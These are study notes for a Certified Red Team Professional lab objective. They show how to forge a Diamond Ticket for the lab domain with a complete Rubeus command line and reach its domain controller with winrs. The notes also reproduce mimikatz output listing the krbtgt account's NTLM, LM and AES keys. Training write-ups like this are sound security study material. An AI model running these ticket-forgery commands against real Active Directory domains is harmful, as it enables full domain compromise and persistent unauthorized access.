Certified Red Team Professional (CRTP) - Notes

10 - LO10

Learning Objective 10


Last updated 21 days ago

Tasks

1 - Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack

Flag 19 [dcorp-dc] - Name of the account whose secrets are used for the Diamond Ticket attack 🚩

Solutions

1 - Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack

Run a new shell as administrator and use the following Rubeus command to execute the Diamond Ticket attack:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

From the newly started process (which holds the injected ticket), access the DC with winrs and confirm the identity in use:

winrs -r:dcorp-dc cmd
set username

Flag 19 [dcorp-dc] - Name of the account whose secrets are used for the Diamond Ticket attack 🚩

The krbtgt account's secrets are used for the Diamond Ticket attack; its aes256_hmac key is the value passed as /krbkey above, as shown in the mimikatz output for the account:

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID   : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
    ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
    lm  - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
    Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
      aes128_hmac       (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
      des_cbc_md5       (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
    Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 150ea2e934ab6b80

* Packages *
    NTLM-Strong-NTOWF
